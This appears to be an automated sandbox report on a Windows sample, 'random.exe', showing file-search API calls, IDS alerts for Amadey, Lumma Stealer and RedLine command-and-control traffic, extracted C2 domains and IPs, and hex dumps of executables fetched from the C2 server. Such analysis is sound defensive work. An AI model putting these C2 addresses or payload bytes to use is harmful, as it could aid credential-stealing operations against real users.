                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0037D3A9
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00389642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00389642
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038979D
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00389B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00389B2B
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00385C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00385C97
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:57262 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059149 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click) : 192.168.2.6:57440 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57266 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57269 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57267 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:57265 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57273 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57274 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57277 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57271 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:57263
                            Source: Network trafficSuricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.6:57279 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:57331 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:57329
                            Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:57343 -> 103.84.89.222:33791
                            Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.6:57348 -> 103.84.89.222:33791
                            Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.6:57335 -> 103.84.89.222:33791
                            Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:57335 -> 103.84.89.222:33791
                            Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.6:57335
                            Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:57335 -> 103.84.89.222:33791
                            Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.6:57335
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:57363 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:57360
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:57269 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57279 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:57365 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57365 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:57370 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:57267 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57267 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57266 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57367 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57367 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57266 -> 104.21.79.9:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57362 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57362 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:57373 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57373 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:57374 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57374 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:57368 -> 172.67.181.203:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:57368 -> 172.67.181.203:443
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://rampnatleadk.click/api
                            Source: Malware configuration extractorIPs: 185.215.113.43
                            Source: Malware configuration extractorURLs: 103.84.89.222:33791
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57335 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57335 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57343 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57343
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57348 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57348
                            Source: global trafficTCP traffic: 192.168.2.6:57335 -> 103.84.89.222:33791
                            Source: global trafficTCP traffic: 192.168.2.6:57133 -> 162.159.36.2:53
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:44:15 GMTContent-Type: application/octet-streamContent-Length: 3034624Last-Modified: Sat, 01 Feb 2025 20:32:21 GMTConnection: keep-aliveETag: "679e84d5-2e4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 8b 84 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 df 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 df 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 71 65 72 74 7a 6d 69 00 40 2b 00 00 b0 06 00 00 34 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 76 73 6e 78 75 74 74 00 10 00 00 00 f0 31 00 00 04 00 00 00 28 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 2c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:45:08 GMTContent-Type: application/octet-streamContent-Length: 1863680Last-Modified: Sat, 01 Feb 2025 20:39:44 GMTConnection: keep-aliveETag: "679e8690-1c7000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 75 bd 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 77 6d 79 75 64 74 77 00 b0 19 00 00 90 2f 00 00 a4 19 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 67 61 65 72 69 6a 7a 00 10 00 00 00 40 49 00 00 04 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 49 00 00 22 00 00 00 4e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:47:13 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Fri, 31 Jan 2025 09:36:52 GMTConnection: keep-aliveETag: "679c99b4-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:48:11 GMTContent-Type: application/octet-streamContent-Length: 1862656Last-Modified: Sat, 01 Feb 2025 20:32:00 GMTConnection: keep-aliveETag: "679e84c0-1c6c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 40 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 49 00 00 04 00 00 8b 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 79 66 78 73 65 6a 62 00 b0 19 00 00 80 2f 00 00 a6 19 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6d 6f 6c 77 6c 73 77 00 10 00 00 00 30 49 00 00 04 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 49 00 00 22 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:48:17 GMTContent-Type: application/octet-streamContent-Length: 1828864Last-Modified: Sat, 01 Feb 2025 20:32:10 GMTConnection: keep-aliveETag: "679e84ca-1be800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 e0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6a 00 00 04 00 00 7f 7c 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7e 